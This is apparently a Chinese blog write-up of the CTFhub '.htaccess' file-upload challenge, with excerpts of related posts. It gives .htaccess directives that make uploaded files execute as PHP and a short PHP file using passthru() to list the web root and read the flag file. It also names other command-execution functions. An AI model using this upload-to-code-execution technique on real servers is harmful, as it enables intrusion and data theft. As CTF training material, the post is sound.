ctf php 文件上传,【CTF整理】CTFhub技能树-Web-文件上传-.htaccess

最新推荐文章于 2024-04-15 21:35:08 发布
最新推荐文章于 2024-04-15 21:35:08 发布
阅读量293 收藏 1
点赞数
文章标签: ctf php 文件上传

【CTF整理】CTFhub技能树-Web-文件上传-.htaccess

CTFhub技能树里面的题最近作了一些,可是除了以前的SQL注入以外,其余的我实在没什么兴趣整理,毕竟网上的整理出来的博主不少,之因此专门整理这个文件上传.htaccess的题目,是由于我踩坑了,本觉得一道简单的题目我就这么硬生生的踩进去了,还差点没出来,浪费了很多金币啊。看别的博主都是上传.htaccess文件,上传修改后缀的一句话木马,菜刀或是蚁剑一连就getshell了,简单的不能再简单,为毛我试了N次都是不行?试了各类形式的.htaccess文件,各类报错。网上如此轻易用蚁剑连上的博主,我是不知道怎么作到的(多是我菜逼吧,不过网上好像就一两个版本,严重怀疑是最开始的那一篇带偏一堆人) 。吐槽结束,记坑。php

一、常规思路

修改.htaccess文件,上传指定后缀名的一句话,菜刀链接getshell。------ 失败html

基本上就这样

8a4e0e6d212be246ac8b13f0d322cb0f.pngweb

我试过的.htaccess内容:

版本1

SetHandler application/x-httpd-php

版本2

AddType application/x-httpd-php .jpg

配合PHP各类一句话文件后缀.jpg,

亲测,菜刀蚁剑没有一个能正常链接,要么200ok啥都不显示或者显示一句话,连不上,要么直接404,还有500的。

这种思路就是网上最流行的思路,想看的小伙伴能够看这里

https://www.cnblogs.com/anweilx/p/12523582.htmlshell

二、PHP passthru()函数

这个方法不须要菜刀,蚁剑什么,弱爆了,直接浏览器访问就看到了flag好吗,给想出这个方法的大佬点赞。

PHP的passthru()这个函数能够直接执行外部命令,用法passthru" ls "),一样有此功能的函数还有

exec()、system()、 shell_exec()等。浏览器

解法

这里先写一个.htaccess文件上传app

//sj随便写的,后面上传的文件没有后缀,就叫sj

SetHandler application/x-httpd-php

而后写sj文件内容以下:svg

#passthru("ls /var/www/html/"); //第一次只写这一行,用来找flag文件在哪里

passthru("cat /var/www/html/flag_229326633.php");//第二次是找到了flag文件以后,直接读取内容

?>

上传sj文件,而后浏览器直接访问文件:

d810716e48a0e877939f37598bfea23c.png这里啥都没有,须要查看源码。(小坑小坑)

05dee982ee2a490a284d45442d1d8e9c.png获得flag函数

总结:

有时候不要太依赖菜刀蚁剑之类的工具,不必定要一句话,咱们还能够直接执行外部命令查看,PHP常见能够用来执行外部命令的函数有 passthru()、exec()、system()、 shell_exec()等。(不要太相信网上的解法,本身多动手尝试)工具

by 久违 2020.5.15 夜code

gumw
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
河南省网络安全高校战队联盟CTF训练营-web文件上传第一期
04-22
"河南省网络安全高校战队联盟CTF训练营-web文件上传第一期" 这个标题揭示了本次训练的主题,主要聚焦于网络安全领域中的一项重要技能——Web文件上传漏洞的利用与防御。CTF(Capture The Flag)是网络安全竞赛的一种...
CTF-Web-Challenge:使用PHPWeb中进行CTF挑战
03-25
在网络安全领域,Capture The Flag(CTF)是一种流行的竞赛形式,让参与者通过解决各种安全问题来展示和提升自己的技能。本挑战专注于Web安全,特别是利用PHP语言进行实战演练。在这个"CTF-Web-Challenge"中,你将有...
CTFHub技能书解题笔记-文件上传-.htaccess
qq_43006864的博客
01-05 1094
打开题目 这里好好看看题干,信息量蛮多的, 索性查查.htaccess。内容蛮多的,这里我就概括一下这道题用到的重点。 htaccess文件是Apache服务器中的一个配置文件,可以帮我们实现:改变文件扩展名。 然后,先构造一个.htaccess文件。文件内容是将文件扩展名改为PHP。方便我们执行马子。 附上文件内容:SetHandler application/x-httpd-php 打开链接 上传.htaccess文件。 然后上传.JPG格式的php马子。 其.
ctfhub文件上传---.htaccess
x2813488062的博客
01-28 1091
.htaccess详解 .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。 .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。 .htac..
CTFHub技能树web文件上传.htaccess
qq_53148935的博客
04-04 719
注:本人第一次写博客,主要是为了记录解题过程,如有不足之处,欢迎指出,但勿喷。 这几天开始做了些ctfhub技能树里面的题目,因为我们这学期开始学了一些web攻防的内容,然后就想着去ctfhub练练技能,话不多说,我们直接进入解题过程。 先看看题目 这里给了些提示内容,说htaccess文件是apache的一个配置文件之类的,有兴趣可以自行百度了解一下。在这题里面,htaccess文件的作用就是让别的文件以你指定的方式运行,如.txt文件可以以.php文件的形式运行。 了解了这些之后我们就会有一
CTFHub技能树 Web-文件上传详解
千寻的博客
11-21 3059
文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。 ———————————————— 版权声明:本文为CSDN博主「Fasthand_」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。 原文链接:ht
CTFHUB-web-文件上传
2301_79783285的博客
12-23 1274
htaccess是一个纯文本文件,存放着Apache服务器配置相关的指令。.htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。.htaccess的用途范围主要针对当前目录。注意:.htaccess文件(特别注意这里文件名不可随意更改,因为 .htaccess 是配置文件)博主这里帮大家把坑踩了,蚁剑死活连不上的原因。
CTF整理CTFhub技能树-Web-文件上传-.htaccess
SunnyCat
05-15 3127
CTF整理CTFhub技能树-Web-文件上传-.htaccess CTFhub技能树里面的题最近做了一些,但是除了之前的SQL注入之外,其他的我实在没什么兴趣整理,毕竟网上的整理出来的博主很多,之所以专门整理这个文件上传.htaccess的题目,是因为我踩坑了,本以为一道简单的题目我就这么硬生生的踩进去了,还差点没出来,浪费了不少金币啊。看别的博主都是上传.htaccess文件,上传修改后缀的一句话木马,菜刀或是蚁剑一连就getshell了,简单的不能再简单,为毛我试了N次都是不行?试了各种形式的.h
CTFhub-文件上传-.htaccess
ssss39的博客
08-31 739
这段内容的作用是使所有的文件都会被解析为php文件。然后上传1.jpg 的文件 内容为一句话木马。首先上传 .htaccess 的文件。
CTFHUB-技能树-Web题-文件上传(无验证,JS前端验证,前端验证)
Static______的博客
04-15 969
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。】后,弹出的【另存为】对话框,在【文件名】一栏中输入【.htaccess】,【保存类型】选择【所有文件】,然后选择要保存的路径,单击【保存】按钮!上传后显示相对路径,访问此路径,发现可以访问,且木马执行成功。此时,再上传一句话木马,并把文件改为png格式。
CTFHub 文件上传 - htaccess
ph51342的博客
07-03 430
CTFHub 文件上传 – htaccess
ctf-web网络安全课程视频.zip
10-19
网盘文件永久链接 1 - 代码执行与命令执行安全漏洞与防御... 2 - 文件上传安全漏洞与防御... 3 - XXE安全漏洞与防御... 4 - SSRF安全漏洞与防御... 5 - PHP反序列化安全漏洞与防御... 6 - Python 安全开发基础...
3.18号日报,ctfhubweb文件上传漏洞题目解法
03-18
本文将基于标题“3.18号日报,ctfhubweb文件上传漏洞题目解法”以及描述“文件上传漏洞”,详细介绍几种典型的文件上传漏洞利用方法及其技术细节。 #### 一、无验证直接上传一句话木马 这类题目是最简单的,...
ctf+web安全+任意文件上传+任意文件下载
10-08
ctf+web安全+任意文件上传+任意文件下载
基于Springboot和Vue的图书借还管理系统源码 图书借还管理系统代码(高分毕设)
07-28
图书借还管理系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug! 系统源码(高分毕设),个人经导师指导并认可通过的98分毕业设计项目,主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者。也可作为课程设计、期末大作业。包含全部项目源码[代码]、该项目可以直接作为毕设使用。项目技术栈:前端是vue,后端是springboot,项目代码都经过严格调试,代码没有任何bug!
C语言内存管理:静态与动态分配的较量
07-28
C语言是一种通用的编程语言,由丹尼斯·里奇(Dennis Ritchie)在20世纪70年代早期于美国电话电报公司(AT&T)的贝尔实验室开发。C语言以其高效性、灵活性和可移植性而闻名,它是一种过程式编程语言,提供了对底层硬件的直接访问能力。 C语言的特点包括: 1. **简洁高效**:C语言的语法简洁,执行效率高,适合编写系统软件。 2. **接近硬件**:C语言提供了对内存地址和位操作的直接控制,使其非常适合硬件级编程。 3. **可移植性**:C语言编写的程序可以在不同的操作系统和硬件平台上编译和运行,具有很好的可移植性。 4. **丰富的库支持**:C语言拥有大量的标准库,如标准输入输出库(stdio.h)、数学库(math.h)等。 5. **结构化编程**:C语言支持结构化编程,允许使用循环、条件判断和函数等控制结构。 6. **指针**:C语言的指针功能强大,可以操作内存地址,实现复杂的数据结构和算法。 7. **编译型语言**:C语言是一种编译型语言,源代码需要通过编译器转换成机器码才能运行。 C语言广泛应用于操作系统(如Unix和Linux)、嵌入式系统、高性能
通讯协议规范-命令包格式
07-28
提供一份通讯协议规范,包含命令包、格式等,在上下位机调试的时候可参考该文档,制定对应的通讯协议。
四足宠物机器狗动态步行规划与仿真.pdf
最新发布
07-28
四足宠物机器狗动态步行规划与仿真
ctf技能树文件上传.htaccess
04-30
文件上传漏洞通常是指在网站中存在对用户上传文件的功能,但是没有对上传文件的类型、大小、数量、路径等进行严格限制或过滤,从而导致攻击者可以通过上传包含恶意代码的文件来实现攻击的目的。而.htaccess是一个常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值